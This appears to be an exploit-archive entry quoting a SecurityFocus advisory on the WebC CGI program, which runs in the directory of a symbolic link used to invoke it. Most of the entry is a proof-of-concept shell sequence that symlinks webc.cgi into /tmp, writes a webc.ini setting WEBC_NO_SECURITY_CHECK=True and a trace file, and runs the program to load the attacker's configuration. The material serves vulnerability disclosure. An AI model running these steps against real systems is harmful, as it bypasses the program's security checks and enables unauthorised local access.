10 lines
No EOL
493 B
Text
10 lines
No EOL
493 B
Text
source: https://www.securityfocus.com/bid/7272/info
|
|
|
|
It has been reported that WebC will execute in the directory of a symbolic link from which it is invoked. Because of this, it may be possible for a local user to load a configuration file that enabled dangerous variables.
|
|
|
|
$ cd /tmp
|
|
$ ln -s /usr/local/apache/cgi-bin/webc.cgi webc.cgi
|
|
$ cp /usr/local/apache/cgi-bin/webc.emf .
|
|
$ echo "WEBC_NO_SECURITY_CHECK=True" > webc.ini
|
|
$ echo "HTML_TRACE_REQUEST=/tmp/.debug1" >> webc.ini
|
|
$ ./webc.cgi |